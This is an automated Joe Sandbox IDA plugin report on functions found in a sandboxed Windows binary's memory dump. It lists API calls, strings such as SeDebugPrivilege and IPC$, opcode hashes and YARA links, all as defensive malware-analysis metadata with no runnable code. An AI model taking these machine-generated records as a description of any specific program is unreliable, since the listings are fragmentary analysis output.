Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 4cff909ac196c2cbf192a9652b25c6a7185f2ce3b4745350f81234447c2ddf0f
Instruction ID: 7e8d7395fed4943e46cf1b3aa92c6e7f52fc4df30f901876d61543b22529a505
Opcode Fuzzy Hash: 4cff909ac196c2cbf192a9652b25c6a7185f2ce3b4745350f81234447c2ddf0f
Instruction Fuzzy Hash: D1110630A5026979EB20A3A6DC5AEFF7ABCEFC1F00F04052AB441A60D0EEB11905D5B0

Function 00FE8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FE8BE8,?,00000000,?,?,?,?,00FE8BBA,00000000,?), ref: 00FE8FC5

DestroyWindow.USER32(?), ref: 00FE8C81
KillTimer.USER32(00000000,?,?,?,?,00FE8BBA,00000000,?), ref: 00FE8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 01026973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00FE8BBA,00000000,?), ref: 010269A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00FE8BBA,00000000,?), ref: 010269B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00FE8BBA,00000000), ref: 010269D4
DeleteObject.GDI32(00000000), ref: 010269E6

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 770f3c135e2d4c3e10bd5506ac6aaa519b7bd814e30be99fa2328159bd5360a4
Instruction ID: 46a70a4684300cc1d7daed2a75ef3594b895eb91c482c81359e4d08613c4299e
Opcode Fuzzy Hash: 770f3c135e2d4c3e10bd5506ac6aaa519b7bd814e30be99fa2328159bd5360a4
Instruction Fuzzy Hash: F2610131502A90DFDB32AF1ACA08B2577F1FB41352F60451DE4C687564CB3BA882EF90

Function 010306DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD6B57: _wcslen.LIBCMT ref: 00FD6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 010307A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010307BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 010307DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 01030804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0103082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01030837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0103083C

Strings

\CLSID, xrefs: 01030724
\IPC$, xrefs: 01030784
SOFTWARE\Classes\, xrefs: 0103070E

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 9fd11368a3debfca0f990a768ae6be19b9497bfdfe535b380c51213caa5ed1ad
Instruction ID: 4e74a3b76e9702790861cccf68629b6cac8d1c814e8848dbc908c02c701a256a
Opcode Fuzzy Hash: 9fd11368a3debfca0f990a768ae6be19b9497bfdfe535b380c51213caa5ed1ad
Instruction Fuzzy Hash: D7413C75C10229ABDF21EB94DC95CEDB7B9FF44750F08416AF981A3261EB349E04DB90

Function 0105055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 010505BC
inet_addr.WSOCK32(?), ref: 0105061C
gethostbyname.WSOCK32(?), ref: 01050628
IcmpCreateFile.IPHLPAPI ref: 01050636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 010506C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 010506E5
IcmpCloseHandle.IPHLPAPI(?), ref: 010507B9
WSACleanup.WSOCK32 ref: 010507BF

Strings

Ping, xrefs: 01050676

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: ccedcc31fb1a7a3e7dbc3c08df56c1e35fa1e6dcd4529ae497f9de791491f01d
Instruction ID: 530c88217615c81d873a2bbb035197678a15986a1affd996b3cd17d89c99e3f5
Opcode Fuzzy Hash: ccedcc31fb1a7a3e7dbc3c08df56c1e35fa1e6dcd4529ae497f9de791491f01d
Instruction Fuzzy Hash: 35918E759042019FD360CF19C988B1BBBE0BF44318F0885A9F9A98B7A6C735ED45CF91

Function 01058CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 01058CF3

Part of subcall function 01038E54: _wcslen.LIBCMT ref: 01038E77

_wcslen.LIBCMT ref: 01058D4E
_wcslen.LIBCMT ref: 01058D9C
_wcslen.LIBCMT ref: 01058DDC
_wcslen.LIBCMT ref: 01058E6E

Strings

none, xrefs: 01058E65, 01058E6A
cdecl, xrefs: 01058D48, 01058D4D
winapi, xrefs: 01058D96, 01058D9B
stdcall, xrefs: 01058DD6, 01058DDB

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: b934d34037c45b8cc22cdb644634b6aa4a9d0ca2efdcb7013ecbadc9748b6a22
Instruction ID: ced4025b4cc7a960c84c0658319db679311b62e2dd4e9f970ef330f5e9854e8a
Opcode Fuzzy Hash: b934d34037c45b8cc22cdb644634b6aa4a9d0ca2efdcb7013ecbadc9748b6a22
Instruction Fuzzy Hash: AD51C032A000169BCFA4DF6DC8508BFB7F6AF54324B24825AEDA6E7285D735DD40D790

Function 01048195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 01048257
SystemTimeToFileTime.KERNEL32(?,?), ref: 01048267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01048273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01048310
SetCurrentDirectoryW.KERNEL32(?), ref: 01048324
SetCurrentDirectoryW.KERNEL32(?), ref: 01048356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0104838C
SetCurrentDirectoryW.KERNEL32(?), ref: 01048395

Strings

*.*, xrefs: 0104839B

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 50c228fe0ce6fb6d992c7b7460577c18d8f9591c53aa6803462a05983567cf86
Instruction ID: 89c388f2d129912c32cfb226af37599b023e3ba6269f36bcfb1e4eb5fddcac56
Opcode Fuzzy Hash: 50c228fe0ce6fb6d992c7b7460577c18d8f9591c53aa6803462a05983567cf86
Instruction Fuzzy Hash: D9616BB25043059FD710EF64C8849AEB3E9FF89310F08896EF9C997261DB35E945CB92

Function 01002C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01002C94

Part of subcall function 010029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000), ref: 010029DE
Part of subcall function 010029C8: GetLastError.KERNEL32(00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000,00000000), ref: 010029F0

_free.LIBCMT ref: 01002CA0
_free.LIBCMT ref: 01002CAB
_free.LIBCMT ref: 01002CB6
_free.LIBCMT ref: 01002CC1
_free.LIBCMT ref: 01002CCC
_free.LIBCMT ref: 01002CD7
_free.LIBCMT ref: 01002CE2
_free.LIBCMT ref: 01002CED
_free.LIBCMT ref: 01002CFB

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: aa965520425a5ba993a18b61e1943a9391fb2edffb4ca5ebf3ae278adad05b08
Instruction ID: c4a5c549467f4ce043041e07c10291093d6a69478084efb5f7e8131261c4af66
Opcode Fuzzy Hash: aa965520425a5ba993a18b61e1943a9391fb2edffb4ca5ebf3ae278adad05b08
Instruction Fuzzy Hash: 1511B676500109BFEB03EF94D885CDD3BA9FF15390F6144A5FA889F2A1DA31EE509B90

Function 0104C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0104C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0104C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0104C2CA
GetLastError.KERNEL32 ref: 0104C322
SetEvent.KERNEL32(?), ref: 0104C336
InternetCloseHandle.WININET(00000000), ref: 0104C341

Strings

, xrefs: 0104C2BB

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 7a7dc09a089ac3c8bd2660e1c96d0a3f78e68be3e3c750da4e8c5038aa4d45d1
Instruction ID: 28d8cdb07ef70945c986e1488bf6a296edbc66dfca4314240e920f69311193f9
Opcode Fuzzy Hash: 7a7dc09a089ac3c8bd2660e1c96d0a3f78e68be3e3c750da4e8c5038aa4d45d1
Instruction Fuzzy Hash: 073171B1601244AFF7319FA58AC4AAF7BFCEF49645B04856DE4C6D2210DB39DA048B60

Function 0103209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 010320AB
GetClassNameW.USER32(00000000,?,00000100), ref: 010320C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0103214D

Strings

SHELLDLL_DefView, xrefs: 010320CC
details, xrefs: 010320FB
smallicons, xrefs: 01032115
list, xrefs: 0103212F
largeicons, xrefs: 010320E1

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 7e9b1bf0809f86d16e1aa8952e7e469cd16d04b7753fbeafb2a7c7083ee340ce
Instruction ID: 21f54509c4581e72a8296e8d99d2ee75b73ecf682fa9df996834551f5e637591
Opcode Fuzzy Hash: 7e9b1bf0809f86d16e1aa8952e7e469cd16d04b7753fbeafb2a7c7083ee340ce
Instruction Fuzzy Hash: 7B110A7A68830AB9FB122526DD16DBB379CCF55724B20015AF784A90A2FAB978016A14

Function 01008D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 343f3fa5452264d369bb29e5d2be5fd7461fb79d65f7e3c0b9dbaae0ca4120c3
Instruction ID: 062819872a75c00b55280d3a0eab8458b490428f348d88a42a49aed3d2cbea9d
Opcode Fuzzy Hash: 343f3fa5452264d369bb29e5d2be5fd7461fb79d65f7e3c0b9dbaae0ca4120c3
Instruction Fuzzy Hash: EDC1BF74D04249AFEB22DFACD844BADBFB4BF09314F04419AF698A72D2C7359941CB61

Function 00FE8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 01026890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 010268A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 010268B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 010268D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 010268F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FE8874,00000000,00000000,00000000,000000FF,00000000), ref: 01026901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0102691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FE8874,00000000,00000000,00000000,000000FF,00000000), ref: 0102692D

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: f1a154aeba12fb1890d103ae59a0cf0d6988fdb1b93ff57a202a72aaa18c3d69
Instruction ID: c9f8aa5137c2875dffb99097cafd85f3a852c5e8b6d8851880593741f11f4258
Opcode Fuzzy Hash: f1a154aeba12fb1890d103ae59a0cf0d6988fdb1b93ff57a202a72aaa18c3d69
Instruction Fuzzy Hash: 0651AE70600645EFEB20DF25CC41FAA7BF5FB88350F104618F996972A0DBB6E991EB50

Function 0104C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0104C182
GetLastError.KERNEL32 ref: 0104C195
SetEvent.KERNEL32(?), ref: 0104C1A9

Part of subcall function 0104C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0104C272
Part of subcall function 0104C253: GetLastError.KERNEL32 ref: 0104C322
Part of subcall function 0104C253: SetEvent.KERNEL32(?), ref: 0104C336
Part of subcall function 0104C253: InternetCloseHandle.WININET(00000000), ref: 0104C341

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: ffbe7c3b0d012973f3a46a118fa097a6e715a8e199554fe7851939e05949692c
Instruction ID: 5ea08834ba652fd1c64b1b9c14f067cdd0380a099a3e12143f21e4c0e5511c3b
Opcode Fuzzy Hash: ffbe7c3b0d012973f3a46a118fa097a6e715a8e199554fe7851939e05949692c
Instruction Fuzzy Hash: 663183B1502641BFFB219FB5DB84A6A7BF8FF14200B04442DF9DA82624D775E4149B60

Function 010325A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 01033A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01033A57
Part of subcall function 01033A3D: GetCurrentThreadId.KERNEL32 ref: 01033A5E
Part of subcall function 01033A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010325B3), ref: 01033A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 010325BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 010325DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 010325DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 010325E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 01032601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 01032605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0103260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 01032623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 01032627

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: e3fe75068930df16e1f5a3bf67cecf61145b31438d232c42754c469bb12ebf41
Instruction ID: a922baef9f9ff51c80b84c6404d31512fd2013c71746be5143616ed0767c744a
Opcode Fuzzy Hash: e3fe75068930df16e1f5a3bf67cecf61145b31438d232c42754c469bb12ebf41
Instruction Fuzzy Hash: 8401D830790610BBFB2076689C8AF593F5DDF8EB11F100001F394AE0D4C9F224458B69

Function 0105A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0103D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0103D501
Part of subcall function 0103D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0103D50F
Part of subcall function 0103D4DC: CloseHandle.KERNEL32(00000000), ref: 0103D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0105A16D
GetLastError.KERNEL32 ref: 0105A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0105A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0105A268
GetLastError.KERNEL32(00000000), ref: 0105A273
CloseHandle.KERNEL32(00000000), ref: 0105A2C4

Strings

SeDebugPrivilege, xrefs: 0105A18F

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 64a245eeb11af54cc8c45b33a95a6558fa9024fd9cc8426812706806545f3a90
Instruction ID: 778f9c987f13c35cea4a2278e8a5a057e3e7a7d90d40510e123a6f882fc919a7
Opcode Fuzzy Hash: 64a245eeb11af54cc8c45b33a95a6558fa9024fd9cc8426812706806545f3a90
Instruction Fuzzy Hash: A961B130204242DFE760DF18C495F5ABBE1AF44358F18858CE9968F7A3C776E945CB91

Function 0103C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0103C913

Strings

blank, xrefs: 0103C895
info, xrefs: 0103C8B4
question, xrefs: 0103C8CC
stop, xrefs: 0103C8E4
warning, xrefs: 0103C8FC

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 00caf5ffd17d8e8e0a75de1baeea8e4e8e40bd548610bb3890630716c461cd9a
Instruction ID: 470ae78f8959afaea8e1818a7093fdecc666b8fd75ee9272e6f8c4ca1babfc9d
Opcode Fuzzy Hash: 00caf5ffd17d8e8e0a75de1baeea8e4e8e40bd548610bb3890630716c461cd9a
Instruction Fuzzy Hash: 3911EB3668930BBAFB019B559D86CAF77DCDF45360B1100AFF580FA182E7A96F006264

Function 0103ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0103ED2A
_wcslen.LIBCMT ref: 0103ED3B
_wcslen.LIBCMT ref: 0103ED79
_wcslen.LIBCMT ref: 0103EDAF
_wcslen.LIBCMT ref: 0103EDDF
_wcslen.LIBCMT ref: 0103EDEF
_wcslen.LIBCMT ref: 0103EE2B
_wcslen.LIBCMT ref: 0103EE5A

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
